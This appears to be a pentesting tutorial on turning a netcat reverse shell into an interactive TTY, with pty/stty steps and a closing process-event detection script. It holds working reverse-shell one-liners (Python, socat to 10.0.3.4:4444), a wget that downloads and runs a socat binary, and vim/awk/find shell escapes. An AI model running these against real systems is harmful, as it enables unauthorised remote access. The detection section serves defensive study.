# Upgrading shell

Netcat is a great tool, but it also has its shortcomings:

* Hitting “Ctrl-C”, for instance, drops the entire shell instead of canceling the current command as on a regular terminal shell;
* You cannot run interactive commands like su to log into other local accounts or SSH to connect to other hosts;
* Text editors like Vim and Nano cannot be used properly to edit files (only non-interactively);
* Features like job control, tab complete and command history with the up-arrow are also missing.

**To overcome some of these problems we need to switch to an interactive TTY (i.e. terminal) shell.**

## **Different PTY modules**

### Python pty module

```
python -c 'import pty; pty.spawn("/bin/sh")'
python3 -c 'import pty; pty.spawn("/bin/sh")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$ip",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

### Perl

```
perl -e 'exec "/bin/sh";'
```

### Using socat

On Kali (listen):

```
socat file:`tty`,raw,echo=0 tcp-listen:4444
```

On Victim (launch):

```
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
```

If socat is not present on the victim, fetch a static binary and launch it from there:

```
wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
```

### Other ways

```
/bin/sh -i
echo os.system('/bin/bash')
exec "/bin/sh";
```

### Related Shell Escape Sequences

Vi / Vim

```
:!bash
```

```
:set shell=/bin/bash
:shell
```

awk

```
awk 'BEGIN {system("/bin/bash")}'
```

find

```
find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \;
```

## **Netcat Magic**

1\. First spawn a PTY shell with Python, running bash inside it:

```
python -c 'import pty; pty.spawn("/bin/bash")'
```

2\. Background the process with **Ctrl-z**

![](https://3331885100-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MkfTlo0T97eXbWuX_cT%2F-Mkk9KK6fkNzF6GVmGoT%2F-MkkAL2eNpt0KmnJzrvV%2Fimage.png?alt=media\&token=183501f6-368d-4ba2-a837-22eed45cdb1a)

3\. Examine the current terminal and STTY info so we can force the connected shell to match it:

```
stty -a | head -n1 | cut -d ';' -f 2-3 | cut -b2- | sed 's/; /\n/'
```

The information needed is the size of the current TTY (for example, `rows 38; columns 116`).

4\. With the shell still backgrounded, set the current STTY to raw mode and disable echoing of input characters (`-echo`) with the following command:

```
stty raw -echo
```

With a raw stty, input/output will look weird and you won't see the next commands as you type them, but they are being processed.
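What `stty raw -echo` changes can be read straight from the terminal's attributes. The following is an added example and not part of the original page: it opens a throwaway pseudo-terminal pair with Python's `pty` module, switches the slave side to raw mode with `tty.setraw` (the same flag changes `stty raw` makes, plus clearing `ECHO`), and reports which line-discipline flags were cleared. The flag tables and the function names `set_flags` and `raw_mode_diff` are this example's own.

```python
"""Show what `stty raw -echo` actually changes, using a throwaway pseudo-terminal."""
import os
import pty
import termios
import tty

# Local-mode (lflag) bits that decide what the *local* terminal does to keystrokes
# before they ever reach the foreground process.
LFLAGS = {
    "ISIG": termios.ISIG,      # Ctrl-C / Ctrl-Z turned into signals locally
    "ICANON": termios.ICANON,  # line buffering: input delivered only on Enter
    "ECHO": termios.ECHO,      # local echo of typed characters
    "IEXTEN": termios.IEXTEN,  # extended input processing (e.g. Ctrl-V)
}
# Input-mode bits: CR->NL translation and Ctrl-S/Ctrl-Q flow control.
IFLAGS = {"ICRNL": termios.ICRNL, "IXON": termios.IXON}
# Output-mode bit: output post-processing such as NL->CRNL.
OFLAGS = {"OPOST": termios.OPOST}


def set_flags(attrs):
    """Names of the flags from the tables above that are set in a tcgetattr() result."""
    iflag, oflag, lflag = attrs[0], attrs[1], attrs[3]
    names = {n for n, bit in IFLAGS.items() if iflag & bit}
    names |= {n for n, bit in OFLAGS.items() if oflag & bit}
    names |= {n for n, bit in LFLAGS.items() if lflag & bit}
    return names


def raw_mode_diff():
    """Open a fresh pty, put its slave side into raw mode, and return (flags before, flags after)."""
    master, slave = pty.openpty()          # assumption: the host exposes /dev/ptmx
    try:
        before = set_flags(termios.tcgetattr(slave))
        tty.setraw(slave)                  # equivalent of `stty raw`; also clears ECHO
        after = set_flags(termios.tcgetattr(slave))
    finally:
        os.close(master)
        os.close(slave)
    return before, after


if __name__ == "__main__":
    before, after = raw_mode_diff()
    print("cleared by raw mode:", sorted(before - after))
```

Seeing `ISIG` and `ICANON` disappear is the whole point of step 4: with `ISIG` off, the local terminal no longer turns Ctrl-C into a SIGINT for the foreground process, so the keystroke travels down the connection instead of killing the listener; with `ICANON` off, each keystroke is sent immediately rather than a line at a time, which is what lets tab-completion and arrow-key history in the remote shell work.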

5\. Next, foreground the shell with `fg`. It will re-open the reverse shell, but the formatting will be off. Finally, reinitialize the terminal by typing `reset` and pressing Enter.

6\. After the `reset`, the shell should look normal again. The last step is to set the shell, terminal type and stty size to match our current Kali window (from the info gathered above):

```
export SHELL=bash
export TERM=xterm-256color
stty rows 38 columns 116
```

![](https://3331885100-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MkfTlo0T97eXbWuX_cT%2F-Mkk9KK6fkNzF6GVmGoT%2F-MkkBIUGDudcnVQ5AIzG%2Fimage.png?alt=media\&token=1456175e-b99e-4955-a793-f845ac052f93)

The end result is a fully interactive TTY with all the features we’d expect (tab-complete, history, job control, etc) all over a netcat connection :)

### **Obtaining a full interactive shell with zsh**

**Current Kali terminals ship with zsh as the default shell, so it is important to learn this method: the one above will not work from a zsh shell.**

1\. Get a TTY shell with the commands above, then background the process with **Ctrl-z**

2\. Get the number of rows and columns with

```
stty -a | head -n1 | cut -d ';' -f 2-3 | cut -b2- | sed 's/; /\n/'
```

3\. To ignore hotkeys in the local shell and return to your reverse shell, enter

```
stty raw -echo; fg
# Note: For zsh users it is important to enter this in one line!
```

4\. Configure your rows and columns

```
stty rows <ROWS> cols <COLS>
```

5\. Export the terminal type

```
export TERM=xterm-256color
```

6\. All you need to do now, is reload your shell:

```
exec /bin/bash
```
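From the defender's side, every victim-side step on this page (spawning a shell through `pty.spawn`, `socat exec:...,pty`, `perl exec`, `awk` or `find` calling `system()`, an editor escape, and the `stty rows/columns` resize that follows the `reset`) shows up as a process-creation event. The following is an added example and not from the original page: a small Python matcher that runs those signatures over a constructed process feed and uses parent lineage to tell a resize issued inside a netcat-delivered session apart from the same command typed over an ordinary SSH login. The `ProcEvent` class, its fields (`pid`, `ppid`, `comm`, `cmdline`), the rule names and the sample events are all this example's assumptions, modelled loosely on an auditd/EDR-style feed.

```python
"""Flag process events that match the TTY-upgrade patterns listed on this page."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    comm: str       # short process name, as an auditd/EDR feed would report it (assumed field)
    cmdline: str    # full command line (assumed field)


# Command-line signatures taken from the techniques listed on this page.
CMDLINE_RULES = [
    ("python pty.spawn shell", re.compile(r"\bpty\.spawn\s*\(")),
    ("socat exec with pty", re.compile(r"\bsocat\b.*\bexec:.*\bpty\b")),
    ("perl exec shell", re.compile(r"\bperl\b.*\bexec\s*[\"']?/bin/(?:ba)?sh")),
    ("awk system() shell", re.compile(r"\bawk\b.*\bsystem\s*\(\s*[\"']/bin/(?:ba)?sh")),
]
# Both spellings used on this page: `stty rows N columns M` and `stty rows N cols M`.
RESIZE_RE = re.compile(r"^stty\s+rows\s+\d+\s+(?:columns|cols)\s+\d+")

NETWORK_PARENTS = {"nc", "ncat", "netcat", "socat"}
EDITOR_PARENTS = {"vi", "vim"}
SHELLS = {"sh", "bash", "dash", "zsh"}


def lineage(by_pid, pid):
    """Comm names of pid and its known ancestors, nearest first (stops at unknown pids)."""
    names, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        names.append(by_pid[pid].comm)
        pid = by_pid[pid].ppid
    return names


def analyse(events):
    """Return (pid, rule name) pairs for every event that trips a rule."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in sorted(events, key=lambda ev: ev.pid):
        for name, rx in CMDLINE_RULES:
            if rx.search(e.cmdline):
                findings.append((e.pid, name))
        ancestors = lineage(by_pid, e.ppid)
        under_net = bool(NETWORK_PARENTS.intersection(ancestors))
        if e.comm in SHELLS and under_net:
            findings.append((e.pid, "shell under network-listener lineage"))
        if RESIZE_RE.match(e.cmdline) and under_net:
            findings.append((e.pid, "tty resize under network-listener lineage"))
        if e.comm in SHELLS and ancestors and ancestors[0] in EDITOR_PARENTS:
            findings.append((e.pid, "shell spawned from editor"))
    return findings


# Constructed sample feed (not real captures): one netcat-delivered session upgraded
# exactly as this page describes, one ordinary SSH login, and a few one-off commands.
SAMPLE_EVENTS = [
    ProcEvent(4100, 4000, "nc", "nc 10.0.3.4 4444"),
    ProcEvent(4101, 4100, "sh", "/bin/sh -i"),
    ProcEvent(4102, 4101, "python", "python -c 'import pty; pty.spawn(\"/bin/bash\")'"),
    ProcEvent(4103, 4102, "bash", "/bin/bash"),
    ProcEvent(4104, 4103, "stty", "stty rows 38 columns 116"),
    ProcEvent(5200, 1, "sshd", "sshd: alice [priv]"),
    ProcEvent(5201, 5200, "bash", "-bash"),
    ProcEvent(5202, 5201, "stty", "stty rows 50 columns 200"),   # benign resize over SSH
    ProcEvent(5301, 5300, "socat",
              "/tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444"),
    ProcEvent(5400, 1, "awk", "awk 'BEGIN {system(\"/bin/bash\")}'"),
    ProcEvent(5500, 900, "find", "find /var/log -name '*.log' -exec gzip {} \\;"),  # benign find
    ProcEvent(5600, 5000, "vim", "vim notes.txt"),
    ProcEvent(5601, 5600, "bash", "/bin/bash"),
    ProcEvent(5700, 1, "perl", "perl -e 'exec \"/bin/sh\";'"),
]

if __name__ == "__main__":
    for pid, rule in analyse(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule}")
```

The lineage check is what keeps the `stty rows ... columns ...` rule useful: the command itself is normal after any terminal resize, so it is only interesting when the shell that ran it descends from a raw network tool rather than from `sshd` or a login manager. In a real pipeline the same rules would be fed from the audit or EDR process-creation stream instead of the constructed list.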
